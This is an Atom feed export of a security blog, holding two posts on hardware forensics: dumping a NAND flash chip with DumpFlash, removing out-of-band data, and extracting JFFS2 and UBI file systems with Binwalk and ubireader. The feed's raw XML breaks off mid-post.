<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8447104270340227710</id><updated>2026-03-29T16:28:52.384+00:00</updated><category term="exploit"/><category term="DoS"/><category term="0day"/><category term="Exploitability Classification: UNKNOWN"/><category term="Binwalk"/><category term="DFIR"/><category term="NAND Dumping"/><category term="VLC"/><category term="WAV"/><category term="forensics"/><category term="AVI"/><category term="CHM"/><category term="DD-WRT"/><category term="Embedthis Appweb"/><category term="Exploitability Classification: Exploitable"/><category term="Exploitability Classification: PROBABLY_EXPLOITABLE"/><category term="IPTables"/><category term="JFFS2"/><category term="MPlayer"/><category term="Nitro Pro"/><category term="PDF"/><category term="Sniffing"/><category term="TAP"/><category term="UBI"/><category term="UBIFS"/><category term="UNKNOWN"/><category term="android"/><category term="colornote"/><category term="recovery"/><title type='text'>NoBytes.com</title><subtitle type='html'>Cyber Security Blog</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.nobytes.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>12</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-4185768887964347967</id><published>2017-01-03T00:55:00.000+00:00</published><updated>2017-01-03T00:55:42.019+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Binwalk"/><category scheme="http://www.blogger.com/atom/ns#" term="DFIR"/><category scheme="http://www.blogger.com/atom/ns#" term="forensics"/><category scheme="http://www.blogger.com/atom/ns#" term="NAND Dumping"/><category scheme="http://www.blogger.com/atom/ns#" term="UBI"/><category scheme="http://www.blogger.com/atom/ns#" term="UBIFS"/><title type='text'>Adventures into NAND Dumping Part 2</title><content type='html'>Following on from my previous post into NAND dumping, I thought I would post about a recent issue I encountered, and also how to extract UBI file-systems.&lt;br /&gt;
&lt;br /&gt;
In this particular case the NAND chip was a SK Hynix&amp;nbsp;H27U1G8F2BTR-BC.&lt;br /&gt;
&lt;br /&gt;
DumpFlash successfully dumped the contents, and listed it with a ID of: ADF101DA.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4inZkHkhP8_-QNqnqj7PsGuF_-mjWYMDkNIeMSDUik3KVoyYVEwTUW71VGF0Fx7SvYqr2Obt244CXJuN7dMvE_CrLU2cyA0vweIam0ji6Rpu60nFRRtM5GozkvoaGNFw3MGwYZURLJns/s1600/ss1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;156&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4inZkHkhP8_-QNqnqj7PsGuF_-mjWYMDkNIeMSDUik3KVoyYVEwTUW71VGF0Fx7SvYqr2Obt244CXJuN7dMvE_CrLU2cyA0vweIam0ji6Rpu60nFRRtM5GozkvoaGNFw3MGwYZURLJns/s200/ss1.png&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
When running the Nand-dump-tool.py (to remove the OOB data), the tool reported back an error:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGcieFEBTJHwiMgMNZt6EoLvbilEVXWzPorkLzF9NEvQ0jhL1ErfSQdsoiUl5jbJmtfPB2nhCkdhmthjDWQAFTn6DpPW8DAoiIrtdOJCRfkrEmCBP6pgEzpKS36nWkEhl4T5CX_RLbkY/s1600/ss2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;148&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGcieFEBTJHwiMgMNZt6EoLvbilEVXWzPorkLzF9NEvQ0jhL1ErfSQdsoiUl5jbJmtfPB2nhCkdhmthjDWQAFTn6DpPW8DAoiIrtdOJCRfkrEmCBP6pgEzpKS36nWkEhl4T5CX_RLbkY/s640/ss2.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I had an immediate suspicion that the ID code was incorrect, so I resorted to the &lt;a href=&quot;http://datasheet.octopart.com/H27U1G8F2BTR-BC-Hyundai-datasheet-11525906.pdf&quot; target=&quot;_blank&quot;&gt;datasheet&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBE5BIQbnKklZASl4UZUbtRcdyZb1TiZ_wHQDjikWnVyk5yk7Vy2jTJ2RpOZtOLUMzzIROkQ4Z55K-s0SLySTJTUAdSMgeeIExKT18KjQ04KOAWY0kbnY8ky38qwk_e8Iew52QwRBhTFo/s1600/ss3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBE5BIQbnKklZASl4UZUbtRcdyZb1TiZ_wHQDjikWnVyk5yk7Vy2jTJ2RpOZtOLUMzzIROkQ4Z55K-s0SLySTJTUAdSMgeeIExKT18KjQ04KOAWY0kbnY8ky38qwk_e8Iew52QwRBhTFo/s640/ss3.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
The 1st bytes represents the Manufacturer Code.&lt;br /&gt;
The 2nd bytes represents the Device Code.&lt;br /&gt;
The 3rd bytes represents the Internal chip number, Cell Type, Number of Simultaneously Programmed Pages.&lt;br /&gt;
The 4th bytes represents the&amp;nbsp;Page size, Block size, Organization, Spare size.&lt;br /&gt;
&lt;br /&gt;
I was then able to remove the OOB data using the new ID (ADF1001D):&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRR1R_L3YIXEemyFUPTDAZWqWpcPympZDdvmbqn9Vtqg0dOIzuK9NBchjz0Q8h04R6JTwoA0ZVyUMxNgNje28lvUJ2UMwpgatEgk0vFZoeb_tdlpUihq9wDACIxN7-jN8_3shBfxmTbws/s1600/ss4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRR1R_L3YIXEemyFUPTDAZWqWpcPympZDdvmbqn9Vtqg0dOIzuK9NBchjz0Q8h04R6JTwoA0ZVyUMxNgNje28lvUJ2UMwpgatEgk0vFZoeb_tdlpUihq9wDACIxN7-jN8_3shBfxmTbws/s640/ss4.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;Extracting UBI contents:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
From here Binwalk was able carve out the UBI data, but was unable to successfully extract its contents:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRE00R7ooBxhqC2jzNmkZ4gwLuxoTbJPJ38P6TEBWIz6lM-KIkOANQt4GyD0lc4JaBcxBtVGV047dCyZD1eKKToONI-uOdzIiKmdHsm35-9qD431aNZ3oFbmAtI3s6rXCbISL5wwfdk9c/s1600/ss5.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;352&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRE00R7ooBxhqC2jzNmkZ4gwLuxoTbJPJ38P6TEBWIz6lM-KIkOANQt4GyD0lc4JaBcxBtVGV047dCyZD1eKKToONI-uOdzIiKmdHsm35-9qD431aNZ3oFbmAtI3s6rXCbISL5wwfdk9c/s640/ss5.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Using the &lt;a href=&quot;https://github.com/jrspruitt/ubi_reader&quot; target=&quot;_blank&quot;&gt;ubireader&lt;/a&gt; package (which is a Binwalk dependency), you can list the Volumes which are contained within the UBI data:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcGcpwuVAK6r6huMRNs4rjGBCgWOuQVW4OQy0eElhJ0P77aiEJTGH9ODVsXlPwmDQ-FxaeG5-wA454YbCD6AnYObvB_1BWDxcobllYdJsVwJ89LklsacN6iuzcFFK_E1wXL4kl-wToBA/s1600/ss6.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;192&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcGcpwuVAK6r6huMRNs4rjGBCgWOuQVW4OQy0eElhJ0P77aiEJTGH9ODVsXlPwmDQ-FxaeG5-wA454YbCD6AnYObvB_1BWDxcobllYdJsVwJ89LklsacN6iuzcFFK_E1wXL4kl-wToBA/s640/ss6.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Then we can extract the volumes:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3YZg04hbPtkJRPIkyksdS97_KwVDnMSQ2V_SWPZyybSAXyi1qqNaGbceeusnRn9UZMFSAcEbpJK3KlooyVJnluYR2JB74C55iEXhRx3MvspNylB5r81xHB7to0BkFWdIpew0XP8tCDw/s1600/ss7.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3YZg04hbPtkJRPIkyksdS97_KwVDnMSQ2V_SWPZyybSAXyi1qqNaGbceeusnRn9UZMFSAcEbpJK3KlooyVJnluYR2JB74C55iEXhRx3MvspNylB5r81xHB7to0BkFWdIpew0XP8tCDw/s640/ss7.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
It should be noted, not all the extracted files are actually UBIFS:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih_jsW8T6IvCxCzCSSkMQyTzItQX1-jBwKVzzjF6aT8CdEA3XguYZcb7n_jxVeZxHuMYilbFQdiACBwpIReL3PtTWfOfFiGxLrqOHqK_AVzxNuQsjYX5dfhPxaSlNc6T8gIXTOIo_fB7g/s1600/ss8.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;154&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih_jsW8T6IvCxCzCSSkMQyTzItQX1-jBwKVzzjF6aT8CdEA3XguYZcb7n_jxVeZxHuMYilbFQdiACBwpIReL3PtTWfOfFiGxLrqOHqK_AVzxNuQsjYX5dfhPxaSlNc6T8gIXTOIo_fB7g/s640/ss8.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Next I let Binwalk automagically extract all the contents:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hm_6z2hvQoWXXa6a_cSjdzqvyrXfEsZ4bYWeOeLPNhJnJO43r4QJ6A6NgyKbR4E5_2I1uxbSGnvot75IaMYAmDkvBDRwpPDJDdzrRm2rVGIKTLcjFsNs-8kWfjmC0XZulXFzd5nI-rU/s1600/ss9.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;324&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hm_6z2hvQoWXXa6a_cSjdzqvyrXfEsZ4bYWeOeLPNhJnJO43r4QJ6A6NgyKbR4E5_2I1uxbSGnvot75IaMYAmDkvBDRwpPDJDdzrRm2rVGIKTLcjFsNs-8kWfjmC0XZulXFzd5nI-rU/s640/ss9.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/4185768887964347967/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2017/01/adventures-into-nand-dumping-part-2.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/4185768887964347967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/4185768887964347967'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2017/01/adventures-into-nand-dumping-part-2.html' title='Adventures into NAND Dumping Part 2'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4inZkHkhP8_-QNqnqj7PsGuF_-mjWYMDkNIeMSDUik3KVoyYVEwTUW71VGF0Fx7SvYqr2Obt244CXJuN7dMvE_CrLU2cyA0vweIam0ji6Rpu60nFRRtM5GozkvoaGNFw3MGwYZURLJns/s72-c/ss1.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-2083150665208361879</id><published>2016-06-19T20:28:00.000+00:00</published><updated>2017-01-02T22:43:20.333+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Binwalk"/><category scheme="http://www.blogger.com/atom/ns#" term="DFIR"/><category scheme="http://www.blogger.com/atom/ns#" term="JFFS2"/><category scheme="http://www.blogger.com/atom/ns#" term="NAND Dumping"/><title type='text'>Adventures into NAND Dumping Part 1</title><content type='html'>Over the next couple of blog posts I intend to document my adventures into NAND dumping.&lt;br /&gt;
My end goal is to dump the contents of NAND and&amp;nbsp;successfully&amp;nbsp;extract its contents.&lt;br /&gt;
This is a learning process for me, so if any information is wrong please let me know and I will correct my post. Additionally if you have any tips or tricks please comment below.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;High-level key points on NAND memory:&lt;/u&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;NAND technical specs are quite often vendor specific. You may have to resort to datasheet.&lt;/li&gt;
&lt;li&gt;Bad Blocks are blocks that contain one or more invalid bits whose reliability is not guaranteed.&lt;/li&gt;
&lt;li&gt;NAND can ship with Bad Blocks from the manufacturer. Manufacturers &lt;i&gt;generally&lt;/i&gt; mark Bad Blocks.&lt;/li&gt;
&lt;li&gt;The smallest writable unit in NAND is a Page (aka Chunk).&lt;/li&gt;
&lt;li&gt;Pages are organised into larger units called a Block.&lt;/li&gt;
&lt;li&gt;The number of Pages per Block is vendor specific.&lt;/li&gt;
&lt;li&gt;Error Correcting Code (ECC) is used to detect (and sometimes correct) errors.&lt;/li&gt;
&lt;li&gt;ECC uses 2 common algorithms: Hamming and BCH&lt;/li&gt;
&lt;li&gt;The Out Of Band (OOB) (aka Spare Area) is a reserved area for ECC and &lt;i&gt;sometimes &lt;/i&gt;metadata.&lt;/li&gt;
&lt;li&gt;The OOB area is stored after each Page.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;u&gt;Physically Accessing the NAND:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
I am using a cheap Chinese hot air reflow station to remove NANDs from boards. I have not yet attempted to reattach a NAND.&lt;br /&gt;
I intend to add further detail at a later date, but essentially the process is to mask the surrounding area with Kapton tape to protect it from heat, then gradually heat up the NAND until the solder flows and you able remove the NAND using tweezers.&lt;br /&gt;
&lt;br /&gt;
Whilst I do have some Bus Pirates/Blasters I have not yet attempted to dump the NAND using SPI/JTAG/etc, this will come in a later blog post.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Dumping Hardware:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
I am using a &quot;TSOP 48 to DIP 48 Pin IC Test Socket Programmer Adapter Converter&quot; with a &quot;Dangerous Prototypes FT2232H Breakout Board 1.0&quot;, based on the design by Jeong Wook (&lt;a href=&quot;https://github.com/ohjeongwook/DumpFlash&quot;&gt;https://github.com/ohjeongwook/DumpFlash&lt;/a&gt;) to query and dump NAND.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhLIVJHhPiwQb3oqCxhxs88Dir4_cHFHYOsqAC3LDcTYLAsEkKEVwMJxN-ARr5mf2dF-QFqI78AbiwQJ0SJtVe_EawxLq_hVJl0nl5AAmfqdYT1HY2KJZ5fbla5REHXS3ZSk4INpCquo/s1600/IMG_20160612_220236.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhLIVJHhPiwQb3oqCxhxs88Dir4_cHFHYOsqAC3LDcTYLAsEkKEVwMJxN-ARr5mf2dF-QFqI78AbiwQJ0SJtVe_EawxLq_hVJl0nl5AAmfqdYT1HY2KJZ5fbla5REHXS3ZSk4INpCquo/s200/IMG_20160612_220236.jpg&quot; title=&quot;&amp;quot;TSOP 48 to DIP 48 Pin IC Test Socket Programmer Adapter Converter&amp;quot; with a &amp;quot;Dangerous Prototypes FT2232H Breakout Board 1.0&amp;quot;&quot; width=&quot;150&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3fTdxi1iISj0Q-IV5kWZKvAVYwGo2KiBf5iNSlm0cebB1nrZrEKF3Ia2EVV2aQpRlLnVTUyGEuc4HGie1RtNpW-UC9lsBkwyxBuo8ylunq_epezJrr1oTmiGHYt8iIzuSg3uEBA0WDoM/s1600/IMG_20160612_220407.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3fTdxi1iISj0Q-IV5kWZKvAVYwGo2KiBf5iNSlm0cebB1nrZrEKF3Ia2EVV2aQpRlLnVTUyGEuc4HGie1RtNpW-UC9lsBkwyxBuo8ylunq_epezJrr1oTmiGHYt8iIzuSg3uEBA0WDoM/s200/IMG_20160612_220407.jpg&quot; title=&quot;48 pin &amp;quot;360-Clip&amp;quot; attached to a &amp;quot;Dangerous Prototypes FT2232H Breakout Board 1.0&amp;quot;&quot; width=&quot;150&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
I also have a 48 pin &quot;360-Clip&quot; attached to a &quot;Dangerous Prototypes FT2232H Breakout Board 1.0&quot;, using the same design/pin out as above. I have NOT had any success with this.&lt;br /&gt;
The intention of using this is so you do not need to detach the NAND from the board. I have tested this with both attached and unattached NAND chips, I can only assume the pin out is wrong?&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Dumping Software:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
I am using DumpFlash.py also by Jeong Wook on Ubuntu 14.04.4 64bit. DumpFlash requires an older version of pyftdi to work.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Target Device:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtKcl8FWh0eD6Ah2YToi-7eRDBPCIgIn41pp73DOf-ZR3YmkpSHje-o_4wblY0PQRMKC3uxp7E_l-1AwiKr13lI6yXs5W1o5qBk6GkIDwvc2oOW5bun_Xvdkw9lWFH67lQQxpwCPIHlOs/s1600/S20160612_0001.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtKcl8FWh0eD6Ah2YToi-7eRDBPCIgIn41pp73DOf-ZR3YmkpSHje-o_4wblY0PQRMKC3uxp7E_l-1AwiKr13lI6yXs5W1o5qBk6GkIDwvc2oOW5bun_Xvdkw9lWFH67lQQxpwCPIHlOs/s200/S20160612_0001.jpg&quot; title=&quot;Toshiba TC58NVG0S3ETA00 NAND&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;This main components of this device are:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;ATMEL AT91SAM9610 ARM processor.&lt;/li&gt;
&lt;li&gt;2 x Pointec PT483208FHG DRAM.&lt;/li&gt;
&lt;li&gt;Toshiba&amp;nbsp;TC58NVG0S3ETA00 NAND.&lt;/li&gt;
&lt;li&gt;ATMEL ATMLH322 EEPROM.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
It is useful to have an understanding of the target device components as this may hint at what you will expect to find on the NAND. In this case a ARM based architecture rather than the traditional x86.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Dumping the NAND:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
First I query the NAND to confirm it is working:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL0mB4YVuKuCgIYSXzG1sI9_3wS21YgQTY2W13SQsrqIly1pjYI6evH49-Hq-24DCpMkYfFAI3baqtdFBmUFWCcpFuFGTI_EA-cvP-MAD6WnuL1k-izn19A9ydIbMtMj1D79x98RFOgxc/s1600/01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;311&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL0mB4YVuKuCgIYSXzG1sI9_3wS21YgQTY2W13SQsrqIly1pjYI6evH49-Hq-24DCpMkYfFAI3baqtdFBmUFWCcpFuFGTI_EA-cvP-MAD6WnuL1k-izn19A9ydIbMtMj1D79x98RFOgxc/s400/01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
As you can see DumpFlash successfully queried the NAND and pulled back information about the Page sizes, etc.&lt;br /&gt;
&lt;br /&gt;
Next to Dump the NAND:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitR9jDZWAiC0GiDdw2kG4w5F_kXusAMvyyYrswBSqoyn_kG-lJ8MgPteKQ-BVaOh9PaTPn952oDEoG_QGD5doRMuJXR5KEMKyAvCNbRfUwEAM5NTDas3SM8WKa-4z0YIXiuyXcCt1gXIk/s1600/02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;65&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitR9jDZWAiC0GiDdw2kG4w5F_kXusAMvyyYrswBSqoyn_kG-lJ8MgPteKQ-BVaOh9PaTPn952oDEoG_QGD5doRMuJXR5KEMKyAvCNbRfUwEAM5NTDas3SM8WKa-4z0YIXiuyXcCt1gXIk/s400/02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dependent on the size of your NAND this process can take several minutes to complete.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGL0gJS-mLZBxXb-ioe1o44svUKe2LHpb1QOzptm5oSxCzXJPkqJAAb6AIC3IeSHQqVLGTZkB8MKXmyFZ5_3PrXbE2UWD7cPxOtvwZLmLXJV5JGL90dnfQSxTWOc91IYXuhLcm8p0TExQ/s1600/03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;70&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGL0gJS-mLZBxXb-ioe1o44svUKe2LHpb1QOzptm5oSxCzXJPkqJAAb6AIC3IeSHQqVLGTZkB8MKXmyFZ5_3PrXbE2UWD7cPxOtvwZLmLXJV5JGL90dnfQSxTWOc91IYXuhLcm8p0TExQ/s400/03.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
With the NAND successfully dumped the first observation is the size discrepancy between the dump and the NAND information. This is because the dump includes both the Main memory and the OOB memory.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Exploring the dump:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Running Binwalk against the dump reveals some promising information, namely the U-Boot Header, Linux Kernel, and JFFS2 file-systems. This indicates the device is Linux based. Unfortunately there are several hundred entries for JFFS2 and Zlib which suggests the data is broken up:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh32pbyD5_m0tpyVi6NkgzxELHNTKgc-rmCNB4qiCgCdJOZTD0ATMTweBDO0phV8lxN8Nxdud3gxN0jI5HmzbptF6vlYIDTiG9dnB5t2pFimCe9dpEc9lwKdLMXY5oKu3BZXpNlGgOwc8k/s1600/04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh32pbyD5_m0tpyVi6NkgzxELHNTKgc-rmCNB4qiCgCdJOZTD0ATMTweBDO0phV8lxN8Nxdud3gxN0jI5HmzbptF6vlYIDTiG9dnB5t2pFimCe9dpEc9lwKdLMXY5oKu3BZXpNlGgOwc8k/s400/04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Looking at the dump in a hex editor indicates the OOB areas are likely causing the problem.&lt;br /&gt;
To remove the OOB data I use a script by&amp;nbsp;Jean-Michel Picod (&lt;a href=&quot;https://bitbucket.org/jmichel/tools/src&quot;&gt;https://bitbucket.org/jmichel/tools/src&lt;/a&gt;):&lt;br /&gt;
&lt;br /&gt;
For the ID I supply the first 4 bytes of the Full ID we extracted earlier with DumpFlash.py.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
